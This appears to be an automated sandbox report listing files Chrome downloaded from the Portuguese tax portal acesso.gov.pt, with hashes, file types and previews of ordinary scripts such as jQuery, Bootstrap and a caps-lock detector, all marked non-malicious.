                                                                                                                Preview:(function ($) {.. if (!window.SA) {.. SA = {};.. }.... //*.. //* Generic Modal Function (Open and Close).. //*.... SA.Modal = function () {.. return {.. Open: function (id, callback) {.. id.fadeIn(600);.. $('html, body').stop().animate({ scrollTop: id.css('margin-top') }, 600);.... if(callback) {.. callback();.. }.. },.. Close: function (id, callback) {.. id.fadeOut(600);.... if(callback) {.. callback();.. }.. }.. };.. }();.... //*.. //* Form: Novo Utilizador.. //*.... SA.newUserForm = function () {.. var theForm = $('#newUserForm'),.. submitBtn = theForm.find('input[type=submit]'),.. notifications = theForm.find('#notifications'),.. inputEmail = theForm.find('input[type=email]'),.. checkboxEmail =
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):622
                                                                                                                Entropy (8bit):7.501607211318584
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:6v/7ykLcz6raGkOz9ecCXMV5uG9FqwsDBvEbH0SPRoCm:/+rsOMtXiu8ApEYaRHm
                                                                                                                MD5:D85725EF09B4F2C2065C1989A027B57B
                                                                                                                SHA1:82A93CC5C31B84278B00BDA52CD8F947211CC4E9
                                                                                                                SHA-256:827204D59451BFAE63E5273AB111FC887D65104855B39DC8356D320AC97072D6
                                                                                                                SHA-512:E8EE36E3CA80E3856922BC5972071CD9B1B8828270F517F536FCC045BBD00BBFACAFBE9BA4129323E0AB57BE32A766A539DDAF5B1BE6FF5DED57B61A2A283257
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1609
                                                                                                                Entropy (8bit):4.686265065538421
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:mLHhP7OIkn2UFiOiV6eigpigNzbak/ef4igtjf4i0/WWig7RWiK:MB02CiOiTi8ioa6iriGijiK
                                                                                                                MD5:430DE688693604EBDF8B06F389A8E12E
                                                                                                                SHA1:98450828D02A8486B92FE86E56CD0B2D1E1B4D42
                                                                                                                SHA-256:E17E63ADB656344E4B23F5A7C6C0F70580551920BDE557D38C9C73A1E9ECF5A3
                                                                                                                SHA-512:FCF3DA5DEC2D2AC53278667EFEB95C784215C15610DF1A6A7E22A2A651F704DA857A764ED46AF712937B9367153882418E3526BA26453D645A916FC3500D3FC1
                                                                                                                Malicious:false
                                                                                                                Preview:var capslockActive = false;..var inputNif = document.getElementById("password-nif");..var inputEori = document.getElementById("password-eori");....function capsLockEventDetect(event) {.. var capsNif = document.getElementById("caps-nif");.. var capsEori = document.getElementById("caps-eori");.. var curr = document.activeElement;.... if (event.getModifierState !== undefined && event.getModifierState("CapsLock")) {.. capslockActive = true;.. if (inputNif === curr) {.. capsNif.style.display = "block";.. }.. else if (capsEori && inputEori === curr) {.. capsEori.style.display = "block";.. }.. } else {.. capslockActive = false;.. capsNif.style.display = "none";.. if (capsEori) {.. capsEori.style.display = "none";.. }.. }..}....document.addEventListener("keydown", function(event) {.. capsLockEventDetect(event);..});....if (inputNif) {.. inputNif.addEventListener("blur", funct
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 618 x 166, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):10264
                                                                                                                Entropy (8bit):7.893606373253685
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:r9/l7HNm2qUdKrEC+VmNIgargB0UFj6jbUpm5e93/YmkpcAX:r9lHXC3ug9FCP5e9vLnAX
                                                                                                                MD5:91E9E0C62F158101C511C746B98AB45D
                                                                                                                SHA1:3D9E122EA989782126594142F5AD03E257A1D96C
                                                                                                                SHA-256:A2BC8BF86EF8D948D5CB87EC1E4B185BF87CF4A731F2F93EA5CC29AE64302AF6
                                                                                                                SHA-512:4C8EDE889D61BE5474BF341283FE2E7756E37E9B5B466F47B1709316EF72088584104F914274E035B1BF36812A80865EDE06DAC044704EFA0C8C72436D3812CE
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):622
                                                                                                                Entropy (8bit):7.501607211318584
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:6v/7ykLcz6raGkOz9ecCXMV5uG9FqwsDBvEbH0SPRoCm:/+rsOMtXiu8ApEYaRHm
                                                                                                                MD5:D85725EF09B4F2C2065C1989A027B57B
                                                                                                                SHA1:82A93CC5C31B84278B00BDA52CD8F947211CC4E9
                                                                                                                SHA-256:827204D59451BFAE63E5273AB111FC887D65104855B39DC8356D320AC97072D6
                                                                                                                SHA-512:E8EE36E3CA80E3856922BC5972071CD9B1B8828270F517F536FCC045BBD00BBFACAFBE9BA4129323E0AB57BE32A766A539DDAF5B1BE6FF5DED57B61A2A283257
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/img/iconGovPt_20x20.png
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):58651
                                                                                                                Entropy (8bit):3.8223322827985586
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:IWb2inOxtoJ6VpwRl13/+4gw0SnG/0S8f0S8wkGfktk/mhE+:Bb22OxOJ6Vpw/13m4gSmhE+
                                                                                                                MD5:7CEF22B9E1BF64EC9597396229900B3A
                                                                                                                SHA1:8E9024B218DCAE87E5451663753BC8607110A2C0
                                                                                                                SHA-256:9206C9C869B248A0BC222DB370113845B0D7BEC0FB0C7CE7AF957D9D2AB2E28D
                                                                                                                SHA-512:D9AEDD640CFDFA3E50425C781FB6C05484DDFCDFCE5946AB07C2C489C59C4E37EC7B93DF79F75FF6084742BA64A46494A210F80D8ABCE071DBB1C1F914F504A5
                                                                                                                Malicious:false
                                                                                                                Preview:(function ($) {.. if (!window.SA) {.. SA = {};.. }.... //*.. //* Generic Modal Function (Open and Close).. //*.... SA.Modal = function () {.. return {.. Open: function (id, callback) {.. id.fadeIn(600);.. $('html, body').stop().animate({ scrollTop: id.css('margin-top') }, 600);.... if(callback) {.. callback();.. }.. },.. Close: function (id, callback) {.. id.fadeOut(600);.... if(callback) {.. callback();.. }.. }.. };.. }();.... //*.. //* Form: Novo Utilizador.. //*.... SA.newUserForm = function () {.. var theForm = $('#newUserForm'),.. submitBtn = theForm.find('input[type=submit]'),.. notifications = theForm.find('#notifications'),.. inputEmail = theForm.find('input[type=email]'),.. checkboxEmail =
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 429 x 727, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):43457
                                                                                                                Entropy (8bit):7.9638651297217935
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:tSWaGYgbYWSuQyZk/wmBfRih+EcQ0DccVdbNWPi8J5W2jLBEKpPL6zt334:t1bYg3gyZ8TOD5cLN58J42jLOKpza4
                                                                                                                MD5:841D0BC9367FBB99D878411AAFF20275
                                                                                                                SHA1:99D2C1BB03118760FDBEED83044AB49015252DD3
                                                                                                                SHA-256:D09142E539ED99866028C1E364414A3AE60B2CB6D0DA260D5C45EAF7959D9EB5
                                                                                                                SHA-512:EA917F73A202E02B67AE4F31E83728DEE29F03D63F4753B8F1741EA9E7562A09EAFA2A47F3D5152B78B884820C43854B693CB8E408086170BA8B014F4CC4163C
                                                                                                                Malicious:false
                                                                                                                Preview:.PNG........IHDR.............>.......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a4af9685-df3c-4b64-81aa-4e7cae4e7227" xmpMM:DocumentID="xmp.did:8E4FF9D58DF311E4B2B8C0A529914AA5" xmpMM:InstanceID="xmp.iid:8E4FF9D48DF311E4B2B8C0A529914AA5" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:d2409a93-3826-4bac-a0fc-945b22676568" stRef:documentID="adobe:docid:photoshop:95e515eb-ba9e-1177-b6de-bfe0123df8d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C....IDATx....]U
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (65367), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):117154
                                                                                                                Entropy (8bit):5.102547231047266
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:1yzGxw4vyBQWlJxtQOIRFHlgmyITm8qAlSFKbv2ctBDIq50Qfu8psYvS1Fz:lw4aL9IRFHlgmK8pPb5qQfpC
                                                                                                                MD5:C3D736F4400B9451E591FF09606D7AF0
                                                                                                                SHA1:D2333A926AE25BBD3056814F13FEC0843468E49E
                                                                                                                SHA-256:C8451F97C65F01678D0137AFA161C420303896E68DD27460B385712E1CC82DB1
                                                                                                                SHA-512:D353430DCE90BDB12ED18A44D84F4C78770146783F9D13FE3E3ED16F5731BEEB3B6FCF29F94CE7C8AD32F047EC3CB291A6AD28AABFB0B37255C57671EFDB7B28
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/css/bootstrap.min.css?cb=5.2.10
                                                                                                                Preview:/*!.. * Bootstrap v3.3.2 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.2 | MIT License | git.io/normalize */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-w
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6518
                                                                                                                Entropy (8bit):2.6111970432860367
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:GjtIzfm79zXQbHCWfyADAolvx8qZybjc1:3Qzgb7y4TJtyP
                                                                                                                MD5:8102D44D0C555D9EA5F0F6E03131734B
                                                                                                                SHA1:108E7CFBE30E36C0FE73DE0591D541371225DC51
                                                                                                                SHA-256:B2CBEBB8F1479868C4FC79E20C8937D94859D45C3445E3C6ECC0841BEC20C67B
                                                                                                                SHA-512:9CDDCF5411D298395551A52168AAD14B3365F3E46CBD3EAA068D07D24E482CA0D73D561D6EDB59EA93C5220533DCF6C329ED92568AFC36BA9C47E651CD585610
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, ASCII text, with very long lines (1475)
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1525
                                                                                                                Entropy (8bit):4.898762569340083
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:DcsWRcieA/Fhxwkw4lPJju6m4ITcbz3LRQfFevzADIctm16A6mNmMg+GX7RRHfA:DydTat4lPJy0ITcP9AevUt9A6S9gd8
                                                                                                                MD5:74EF677768ABAA390ECD61C5E55F7D32
                                                                                                                SHA1:1362473BA9A3B0E993737D67862586FF7F611B6A
                                                                                                                SHA-256:FCC6F846F1230079B8049C30BAC80ABD2E9B2D68E8F90E985A33008F2574C294
                                                                                                                SHA-512:53F9ABE1BD59163142F5598A68AD0E1A821BF274DF122760731A16D7CBDA8DBC2C467D68D1981AFBFCA50A12A94CEBD636072DDF0C19AFEC5B8858B481B54D56
                                                                                                                Malicious:false
                                                                                                                Preview:window.PF||(PF={}),window.PF.common||(PF.common={footer:'<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n.&ordm; 2, do Decreto-Lei n.&ordm; 118/2011, de 5 de dezembro. Para cumprimento do Regulamento Geral sobre a Prote&ccedil;&atilde;o de Dados (RGPD) e da Lei n.&ordm; 58/2019, de 8 de agosto, o Despacho n.&ordm; 13949-A/2022 designou a mestre In&ecirc;s Oliveira Andrade de Jesus como <a href="@info-url@/pt/at/Pages/Encarregado_protecao_dados.aspx" title="encarregada da prote&ccedil;&atilde;o de dados">encarregada da prote&ccedil;&atilde;o de dados</a> da AT. Os titulares dos dados podem contactar a encarregada da prote&ccedil;&atilde;o de dados da AT sobre todas as quest&otilde;es relacionadas com o tratamento dos seus dados pessoais e com o exerc&iacute;cio dos direitos que lhe s&atilde;o conferidos pelo RGPD atrav&eacute;s do endere&c
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):852
                                                                                                                Entropy (8bit):4.424544189875972
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:2b6gQHF5qKbs75WwYciwXSfTug6RnA5fQEHTmNRdjBxSiHFxrsRxM:2OgQdsFQhw4yXRA5BkjfHPAa
                                                                                                                MD5:593751414148EB74201C2D209A609E4A
                                                                                                                SHA1:7DA3CEBC757A98E2C3CFF4EA9BF85FDD646A9923
                                                                                                                SHA-256:B2BD6402F209266B7E64C146C77388E67C12E3A6D8B81D18076E6801608DAE6C
                                                                                                                SHA-512:03F306CB5F7C9BF614C1DCFFB6850029886A9EF44F36F6D454B5848AE9D830B6EA8A39EE7DFC6F68E57C254BA66C025D9374A885846997158BC7B29CC8B42C94
                                                                                                                Malicious:false
                                                                                                                Preview:(function($,sr){.... // debouncing function from John Hann.. // http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/.. var debounce = function (func, threshold, execAsap) {.. var timeout;.... return function debounced () {.. var obj = this, args = arguments;.. function delayed () {.. if (!execAsap).. func.apply(obj, args);.. timeout = null;.. };.... if (timeout).. clearTimeout(timeout);.. else if (execAsap).. func.apply(obj, args);.... timeout = setTimeout(delayed, threshold || 100);.. };.. }.. // smartresize.. jQuery.fn[sr] = function(fn){ return fn ? this.bind('resize', debounce(fn)) : this.trigger(sr); };....})(jQuery,'smartresize');
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1303), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3496
                                                                                                                Entropy (8bit):4.9627602211027035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:4WNFT6rFZdTat4lPJ90ITcP9AevUt9A6S9IAArqGnjdlzS9hakP1GzJ1tJwlgODJ:56rc4x9lDmYqAzm8Il5D5eFk
                                                                                                                MD5:1502FECE40BD14167173803D98F8281B
                                                                                                                SHA1:2B3F37EF634960A4E95C06A6A5F9F12932D0F586
                                                                                                                SHA-256:FE1B489D668E0538B6A0CAA3D2FDC372E7C32D70C036188E3910A016B75DE21F
                                                                                                                SHA-512:23C8FE828F2C78F1FDEEA7AC6EFFDA00F749757573001FA1235D953BD31E9D545451C28C4D5BD9FE05DD4D2E4F0C2695BD57EADB55C99AE7A100B8A3B6900621
                                                                                                                Malicious:false
                                                                                                                Preview:window.onload = function() {.... /**.. * Preencher footer com a info do RGPD.. */.... var footerElem = document.getElementById("footer-rgpd-content");.... if (window.PF && window.PF.common && window.PF.common.footer) {.... footerElem.innerHTML = PF.common.footer;.... } else {.... footerElem.innerHTML = '<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n.&ordm; 2, do Decreto-Lei n.&ordm; 118/2011, de 5 de dezembro. Para cumprimento do Regulamento Geral sobre a Prote&ccedil;&atilde;o de Dados (RGPD) e da Lei n.&ordm; 58/2019, de 8 de agosto, o Despacho n.. 13949-A/2022 designou a mestre In&ecirc;s Oliveira Andrade de Jesus como <a href="@info-url@/pt/at/Pages/Encarregado_protecao_dados.aspx" title="encarregada da prote&ccedil;&atilde;o de dados">encarregada da prote&ccedil;&atilde;o de dados</a> da AT. Os ti
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (32025), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):35961
                                                                                                                Entropy (8bit):5.18176511611712
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:K8lBD27UwlNBMl9/qahC2+jS1g8ep0skCXFXflcLGf3Z1RQ:Be78+S1Klvl13ZrQ
                                                                                                                MD5:D553B8F8CFF983D211D68FC7E9445121
                                                                                                                SHA1:DDD0F156ABA8E3C5F2BF865D81DB38052280D3DE
                                                                                                                SHA-256:47DFF31AB3E6C7ACB2D21E50F930D13816188F208BB62486E32F33A31CC21D9B
                                                                                                                SHA-512:16EC46A4C87090B3D6F8A60B35AE919050DEA0F6104E1F8A2C6B61E715C0E90900C33EF60569F1EB6195DA104938E519CE4F024637FECD521A208B86835C4454
                                                                                                                Malicious:false
                                                                                                                Preview:/*!.. * Bootstrap v3.3.4 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */..if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transi
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:assembler source, ASCII text, with very long lines (540), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):217455
                                                                                                                Entropy (8bit):4.965877834386948
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:STm0bed4vm25c3S2Qle55+sI+PICshVeRvdVDlCWn7L:gvm25c3S2QleFlD
                                                                                                                MD5:A78C1B5A7B0E848E2D35585AA15C87F0
                                                                                                                SHA1:99901C325151BF3298B5FFD30340BF84BB040659
                                                                                                                SHA-256:14866C56B2B92C62667A2E90A578F7B3E2183001B551E800652D7CC363B15992
                                                                                                                SHA-512:EE8A232314D50A57EE036429B173FADC9C712107FBEF0AB0CCD49128B1637F63767D0650200E758ECC677D0A01B3E3AC3369BB57088FAED894D3D1902892937D
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/pf/css/pf-main.css?cb=5.2.10
                                                                                                                Preview:@charset "UTF-8";...font-smooth {.. -webkit-font-smoothing: antialiased;..}...optimizeLegibility {.. text-rendering: optimizeLegibility;..}...hiddenOnOff {.. display: none;..}...hide-text {.. font: 0/0 serif;.. text-shadow: none;.. color: transparent;..}...text-overflow {.. overflow: hidden;.. text-overflow: ellipsis;.. white-space: nowrap;..}...menu-main-list a {.. font-weight: bold;.. color: #0084cc;..}../*! normalize.css v3.0.2 | MIT License | git.io/normalize */..html {.. font-family: sans-serif;.. -ms-text-size-adjust: 100%;.. -webkit-text-size-adjust: 100%;..}..body {.. margin: 0;..}..article,..aside,..details,..figcaption,..figure,..footer,..header,..hgroup,..main,..menu,..nav,..section,..summary {.. display: block;..}..audio,..canvas,..progress,..video {.. display: inline-block;.. vertical-align: baseline;..}..audio:not([controls]) {.. display: none;.. height: 0;..}..[hidden],..template {.. display: none;..}..a {..
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 212 x 65, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8698
                                                                                                                Entropy (8bit):7.972129156306832
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ojhCKmMRBXYAd45wOwagxDag9N9U4jytCx13xarqtspgLJEq7T3:MCLMHXEIDagn9U4jrT8Oys
                                                                                                                MD5:743EF9C73729BA67476CA30566FC0D26
                                                                                                                SHA1:6B56E95B4BDE6F2B5A5B7408FD15C0BA36FF6527
                                                                                                                SHA-256:4B49BD0B9A19851F0941CAB4389766487335F98B8C250451455CDB81DBE0AC4C
                                                                                                                SHA-512:5AA2B9A8F64D893FFAE8668839BB2178060BD02BF78BEDEE6293BF3BE61415F02128D124D3FB1049F85FDE0F166F7AACB5B471AAF75E02D0B5411CE50D975679
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 212 x 65, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):8698
                                                                                                                Entropy (8bit):7.972129156306832
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ojhCKmMRBXYAd45wOwagxDag9N9U4jytCx13xarqtspgLJEq7T3:MCLMHXEIDagn9U4jrT8Oys
                                                                                                                MD5:743EF9C73729BA67476CA30566FC0D26
                                                                                                                SHA1:6B56E95B4BDE6F2B5A5B7408FD15C0BA36FF6527
                                                                                                                SHA-256:4B49BD0B9A19851F0941CAB4389766487335F98B8C250451455CDB81DBE0AC4C
                                                                                                                SHA-512:5AA2B9A8F64D893FFAE8668839BB2178060BD02BF78BEDEE6293BF3BE61415F02128D124D3FB1049F85FDE0F166F7AACB5B471AAF75E02D0B5411CE50D975679
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/img/logo-at.png
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (32086), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):95790
                                                                                                                Entropy (8bit):5.394132126458497
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:EPEkjP+iADIOr/NEe876nmBu3HvF38sEeL8FoqqhJ7SerN5wVI+xcBpPv7E+nzmN:bNMzqhJvN32cBd7M6Whca98Hr4
                                                                                                                MD5:4DC834D16A0D219D5C2B8A5B814569E4
                                                                                                                SHA1:4FBE0563917D6F6289E4E1B4A0A8758E4E43BDA9
                                                                                                                SHA-256:91222F96F34735EBC88DF208017E54D4329B9202E3E52367FB8B149698A1A5EF
                                                                                                                SHA-512:6FBEC4785A21520FA623D1A151C6C8B64BAA1321AC6918A127BCFC22E49EC2E3BCD161AF9C237BD5C70BC4046EB12CF434563F86CBDC9876EB67FB2DEA87034B
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10
                                                                                                                Preview:/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){re
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, ASCII text, with very long lines (5238), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5418
                                                                                                                Entropy (8bit):5.295213776015613
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:t4A8XX1wZG2DcHcmlG8Q48tZGruP0XTepmNWb14ANxYPeqdqPqyPC0m2lY:tUwZG2g8myTtZ6lKQob1dHYPeIny6xX
                                                                                                                MD5:D704F7C9C62C47B265F2C5700A45743E
                                                                                                                SHA1:F652122ED0AAA37EDC4707975B45AE3641EC6D10
                                                                                                                SHA-256:20C35EBC2DAEB43DA1383ED5C762C2EDDFCF762B389883924397F75BB6442D7B
                                                                                                                SHA-512:E469B5C61A8CB94A31DF124F3159855434A4E0AEE386E20A5E82BBE1D23A353B58F29EB317BFB15DB8ED879BAECE851AC92F2DA1857D019D7C104BA0D813E6D2
                                                                                                                Malicious:false
                                                                                                                Preview:/* Modernizr 2.8.3 (Custom Build) | MIT & BSD.. * Build: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes.. */..;window.Modernizr=function(a,b,c){function z(a){i.cssText=a}function A(a,b){return z(l.join(a+";")+(b||""))}function B(a,b){return typeof a===b}function C(a,b){return!!~(""+a).indexOf(b)}function D(a,b){for(var d in a){var e=a[d];if(!C(e,"-")&&i[e]!==c)return b=="pfx"?e:!0}return!1}function E(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:B(f,"function")?f.bind(d||b):f}return!1}function F(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+n.join(d+" ")+d).split(" ");return B(b,"string")||B(b,"undefined")?D(e,b):(e=(a+" "+o.join(d+" ")+d).split(" "),E(e,b,c))}var d="2.8.3",e={},f=b.documentElement,g="modernizr",h=b.createElement(g),i=h.style,j,k={}.toString,l=" -webkit- -moz- -o- -ms- ".split(" "),m="Webkit Moz O ms",n=m.split(" "),o=m.toLowerCase().split(" "),p={},q={},r={},s=[],t=s.
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):852
                                                                                                                Entropy (8bit):4.424544189875972
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:2b6gQHF5qKbs75WwYciwXSfTug6RnA5fQEHTmNRdjBxSiHFxrsRxM:2OgQdsFQhw4yXRA5BkjfHPAa
                                                                                                                MD5:593751414148EB74201C2D209A609E4A
                                                                                                                SHA1:7DA3CEBC757A98E2C3CFF4EA9BF85FDD646A9923
                                                                                                                SHA-256:B2BD6402F209266B7E64C146C77388E67C12E3A6D8B81D18076E6801608DAE6C
                                                                                                                SHA-512:03F306CB5F7C9BF614C1DCFFB6850029886A9EF44F36F6D454B5848AE9D830B6EA8A39EE7DFC6F68E57C254BA66C025D9374A885846997158BC7B29CC8B42C94
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/smartresize.js?cb=5.2.10
                                                                                                                Preview:(function($,sr){.... // debouncing function from John Hann.. // http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/.. var debounce = function (func, threshold, execAsap) {.. var timeout;.... return function debounced () {.. var obj = this, args = arguments;.. function delayed () {.. if (!execAsap).. func.apply(obj, args);.. timeout = null;.. };.... if (timeout).. clearTimeout(timeout);.. else if (execAsap).. func.apply(obj, args);.... timeout = setTimeout(delayed, threshold || 100);.. };.. }.. // smartresize.. jQuery.fn[sr] = function(fn){ return fn ? this.bind('resize', debounce(fn)) : this.trigger(sr); };....})(jQuery,'smartresize');
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (32025), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):35961
                                                                                                                Entropy (8bit):5.18176511611712
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:K8lBD27UwlNBMl9/qahC2+jS1g8ep0skCXFXflcLGf3Z1RQ:Be78+S1Klvl13ZrQ
